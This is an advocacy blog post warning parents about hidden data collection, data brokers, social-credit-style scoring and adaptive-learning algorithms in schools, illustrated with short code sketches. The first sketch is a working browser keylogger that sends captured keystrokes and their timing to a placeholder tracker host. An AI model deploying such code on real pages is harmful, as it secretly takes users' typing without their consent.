
Your internet searches say a lot about you (or your children), and what they say might not be all good, or even accurate. The information collected by hidden algorithms is not limited to what you search for; it’s everything you do on the computer: what you type, how fast you type, your emotions (even keystroke patterns can apparently reveal emotional state), how slowly a child reads, how poorly he spells, whether he is faking ADHD, and let’s not forget data badges.
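
How easy is that kind of tracking? The browser-side sketch below is a minimal, hypothetical illustration of logging what a visitor types and the millisecond gaps between keystrokes (“keystroke dynamics”), which is the raw material behind the typing-speed and emotion claims above. The collection URL is made up, and this is not any vendor’s actual code.

```typescript
// Illustrative sketch only: how a web page could log what a visitor types and
// the millisecond gaps between keystrokes ("keystroke dynamics").
// The endpoint URL is hypothetical; no real vendor's code is shown here.

interface KeyEvent {
  key: string;    // which key was pressed
  downAt: number; // timestamp in ms when the key went down
  gapMs: number;  // delay since the previous keystroke
}

const events: KeyEvent[] = [];
let lastDownAt = 0;

document.addEventListener("keydown", (e: KeyboardEvent) => {
  const now = performance.now();
  events.push({
    key: e.key,
    downAt: now,
    gapMs: lastDownAt ? now - lastDownAt : 0,
  });
  lastDownAt = now;
});

// Periodically ship the captured keystrokes to a collection server.
// "https://tracker.example.com/keystrokes" is a made-up URL for illustration.
setInterval(() => {
  if (events.length === 0) return;
  navigator.sendBeacon(
    "https://tracker.example.com/keystrokes",
    JSON.stringify(events.splice(0, events.length))
  );
}, 5000);
```

A few dozen lines capture typing content and timing; whether that timing really reveals emotion is the vendors’ claim, not something this sketch demonstrates.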

This Good Morning America Investigates segment shows that a simple internet search for medical symptoms or hay fever can land your name, your address, and more on a list of people with heart disease, or incorrectly label you an asthma sufferer. Every internet search, everything you do online, can be tracked by companies using computer programs, as explained in the 60 Minutes piece The Data Brokers.


Personal information about you can be gathered by a computer algorithm, then analyzed, packaged by data brokers, and sold to different markets. Lists can be sold to drug companies, insurance companies, prospective employers, colleges, literally anyone with an interest. Are you wondering what lists you are on, whether the data on those lists are accurate, or how those data are being used? You should be curious and concerned, because data algorithms can be biased, data can be wrong, and passive data-collecting algorithms seem to be everywhere, including schools, yet no one can see them.
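
For a sense of how a search query becomes an entry on a health list, here is a toy sketch of the kind of joining a data broker could do. Every name, field, and the crude “respiratory” rule are invented for illustration; real brokers’ pipelines are proprietary and far larger.

```typescript
// Toy sketch of data-broker list building. All names, fields, and the
// "respiratory" inference rule are invented for illustration.

interface BrowsingEvent { email: string; query: string }
interface IdentityRecord { email: string; name: string; address: string }

// Source 1: search queries bought or collected from tracking scripts.
const browsing: BrowsingEvent[] = [
  { email: "jane@example.com", query: "hay fever symptoms" },
  { email: "sam@example.com", query: "best running shoes" },
];

// Source 2: names and addresses from another data set (e.g. warranty cards).
const identities: IdentityRecord[] = [
  { email: "jane@example.com", name: "Jane Doe", address: "12 Elm St" },
];

// A crude rule turns a search term into a health label -- right or wrong.
const looksRespiratory = (q: string) => /hay fever|asthma|inhaler/i.test(q);

// Join the two sources into a sellable "asthma sufferers" list.
const asthmaList = browsing
  .filter((b) => looksRespiratory(b.query))
  .map((b) => identities.find((i) => i.email === b.email))
  .filter((i): i is IdentityRecord => i !== undefined);

console.log(asthmaList); // [{ email: "jane@example.com", name: "Jane Doe", ... }]
```

Notice that Jane searched for hay fever, not asthma, yet she ends up named and addressed on an “asthma sufferers” list, exactly the kind of inaccuracy the GMA segment describes.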


Facebook claims to know your posture, can map your face, and says it can recognize you from the back of your head. Facebook also reportedly holds a patent on technology that could be used to evaluate your credit risk by looking at your social network connections and determining your creditworthiness. (So who you are friends with on Facebook could affect your credit score?!) Wow. This sounds incredibly similar to what is already happening in China:


In China, every citizen is being assigned a credit score that drops if a person buys and plays video games, or posts political comments online “without prior permission,” or even if social media “friends” do so. The ACLU said the credit rating system, an Orwellian nightmare, should serve as a warning to Americans.–ACLU
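
To make that mechanism concrete, here is a deliberately simplistic sketch of “credit by association”: an applicant’s score is blended with the average of their connections’ scores. This is not Facebook’s patented method or China’s actual system, just the idea in miniature, with made-up names and numbers.

```typescript
// Hypothetical illustration of "credit by association": an applicant's score
// is blended with the average score of their social connections.
// Not any real scoring system -- just the mechanism in miniature.

interface Person { id: string; baseScore: number; friends: string[] }

const people: Record<string, Person> = {
  alice: { id: "alice", baseScore: 720, friends: ["bob", "carol"] },
  bob:   { id: "bob",   baseScore: 540, friends: ["alice"] },
  carol: { id: "carol", baseScore: 500, friends: ["alice"] },
};

function socialCreditScore(id: string, friendWeight = 0.3): number {
  const person = people[id];
  const friendScores = person.friends.map((f) => people[f].baseScore);
  const friendAvg =
    friendScores.reduce((a, b) => a + b, 0) / friendScores.length;
  // Blend the applicant's own score with their friends' average.
  return Math.round(
    (1 - friendWeight) * person.baseScore + friendWeight * friendAvg
  );
}

console.log(socialCreditScore("alice")); // 660: Alice is penalized for her friends
```

In this toy version, Alice’s own record supports a 720, but her connections drag her to 660, which is the whole point of the objection: your score moves because of what other people do.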


Not to unfairly single out Facebook; others have been questioned about their data-gathering technology. Consider Pearson’s Quotient, which tracks children’s micro-movements and claims to detect ADHD, or what Pearson calls “ADHD fakers.” There’s also Microsoft’s Cortana, with its voice recording and facial recognition, and Google’s microphone, which can record your voice unless disabled. TIME Magazine recently called out Google for its voice-recording feature, saying “This is not OK Google.”

School:  Is personalized learning getting too personal?

Let’s switch gears and talk about the astonishing amount of data being collected on schoolchildren, much of it generated and collected while students are online. There is a huge push for innovation and machine learning in education, moving all curriculum and testing to computers and online platforms rather than traditional textbooks and paper and pencil.

When computers “teach” your child, the online algorithms can gather millions of data points about your child. Maybe the hidden computer programs should be called something like “Robot Teaching,” or maybe “Vulcan Mind-Melding,” if you are a Star Trek fan.

Algorithms: While the student is learning online, the computer is also learning about the student.

The ed-tech industry calls this form of student data tracking “personalized learning,” or adaptive, customized education, because of the algorithms used to discover how a student thinks, feels, and learns while online. Personalized learning can collect literally millions of data points per day, per child.
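
What does an “adaptive” algorithm look like in practice? Here is a minimal, hypothetical sketch: every answer a student gives both updates the software’s internal estimate of that student and appends another telemetry record. The field names and the update rule are invented, not any vendor’s real model, but the loop shows why the record count climbs with every click.

```typescript
// Minimal sketch of an adaptive-learning loop. Every interaction both updates
// an estimate of the student and appends a telemetry record. Field names and
// the update rule are hypothetical, not any vendor's actual algorithm.

interface InteractionRecord {
  studentId: string;
  itemId: string;
  correct: boolean;
  responseMs: number; // how long the student took to answer
  hintsUsed: number;
  timestamp: number;
}

const telemetry: InteractionRecord[] = [];

// A one-number model of the student; real systems track far more.
let estimatedAbility = 0.5; // 0 = struggling, 1 = mastered

function recordAnswer(rec: InteractionRecord): void {
  telemetry.push(rec); // one record per answer-level interaction

  // Simple exponential update: the estimate drifts toward the observed outcome.
  const observed = rec.correct ? 1 : 0;
  estimatedAbility = 0.9 * estimatedAbility + 0.1 * observed;
}

// Pick the next item based on the current estimate of the student.
function nextItemDifficulty(): "easy" | "medium" | "hard" {
  if (estimatedAbility < 0.4) return "easy";
  if (estimatedAbility < 0.7) return "medium";
  return "hard";
}

recordAnswer({
  studentId: "s-123", itemId: "frac-07", correct: false,
  responseMs: 48_000, hintsUsed: 2, timestamp: Date.now(),
});
console.log(nextItemDifficulty(), telemetry.length); // "medium", 1
```

Multiply one record per answer by timing events, hint requests, and keystrokes across a school day, and it becomes clear where claims of millions of data points per day, per child come from, and that none of those records are ones a parent ever sees.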

Parents are concerned because children are increasingly required to use computers at school while this unseen data collection goes unchecked. Nearly every state has passed (or is proposing) some form of data privacy legislation to protect students. But the companies taking the data, very wealthy and powerful companies, spend lots of money and send lobbyists and representatives (like this Google rep) to draft, weaken, or outright oppose the bills.


Are legislators ignoring algorithms? Who are they protecting?

One has to wonder WHY nearly every student data privacy bill being passed comes with language resembling this exemption for algorithms, found in Jeb Bush’s Foundation for Excellence in Education model student privacy legislation:

[Image: excerpt from the Foundation for Excellence in Education model bill, with the adaptive-learning exemption underlined]

There’s that phrase again–adaptive learning–and most student privacy laws don’t cover it.

There are no laws prohibiting adaptive learning algorithms and no laws requiring the companies to disclose what the algorithms are collecting. Why bother writing a privacy bill that doesn’t protect privacy? The word oxymoron comes to mind. How can educators or legislators promote a student privacy bill that in fact exempts any and all unknown data-mining algorithms? That is like an auto insurance company covering all accidents that don’t involve an automobile.


Even Microsoft acknowledges the problems with taking students’ data and so-called “anonymous” algorithms:

“The question of whether a specific piece of student data is considered “PII” from an “education record” protected by FERPA short circuits some critical discussion about what technologies are in use in schools and what information they collect, or are capable of collecting.  It also potentially sidelines an important discussion about whether we care about large amounts of aggregated information that might not be “personally identifiable” under FERPA, but can still generate student privacy concerns. As two notable privacy researchers have highlighted, companies can use sophisticated data analytics tools to “anonymously” data mine customer documents or emails and then use the resulting information for a range of purposes, including building advertising profiles.” -Microsoft

So with that statement, SURELY, Microsoft wouldn’t support exempting these sophisticated analytical algorithms that “anonymously” take student data, right, Microsoft?
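
What the quoted researchers describe can be sketched in a few lines: strip out the name, key everything to a stable pseudonymous ID, and the interest profile accumulates anyway. The hashing scheme and the categories below are invented for illustration, not Microsoft’s or anyone else’s actual pipeline.

```typescript
// Sketch of "anonymous" profiling: no name or email is stored, but a stable
// pseudonymous ID lets interest signals pile up into an ad profile anyway.
// The hashing scheme and categories are invented for illustration.

import { createHash } from "node:crypto";

// Replace the account identifier with a one-way hash ("de-identified").
const pseudonymize = (accountId: string): string =>
  createHash("sha256").update(accountId).digest("hex").slice(0, 16);

const adProfiles = new Map<string, Set<string>>();

function recordInterest(accountId: string, category: string): void {
  const pid = pseudonymize(accountId);
  if (!adProfiles.has(pid)) adProfiles.set(pid, new Set());
  adProfiles.get(pid)!.add(category);
}

// Signals mined from documents, emails, or classroom activity over time:
recordInterest("student-42@school.example", "struggling-reader");
recordInterest("student-42@school.example", "video-games");
recordInterest("student-42@school.example", "asthma");

// No "personally identifiable information" is stored, yet the profile is
// detailed and durable, and the same hash is produced every session.
console.log(adProfiles.get(pseudonymize("student-42@school.example")));
// Set { 'struggling-reader', 'video-games', 'asthma' }
```

The point of the sketch is the one the quote makes: data can fail the legal test for “personally identifiable” and still amount to a lasting, marketable profile of a specific child.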

Testing and curriculum companies are making billions from the sale of mandated online standardized tests, like those mentioned in the video Last Week Tonight with John Oliver: Standardized Testing.

Maybe someone will ask the incredibly clever and humorous John Oliver to do a follow-up on what ‘computer things’ are doing to kids.

If John Oliver thought the tremendous pressure of standardized testing was ridiculous in itself, one has to wonder what he would say about the unknown algorithms, #RobotTeaching, and childhood data being collected, experimented on, and marketed without parents even knowing. @iamjohnoliver, what do you say?


Cheri Kiesecker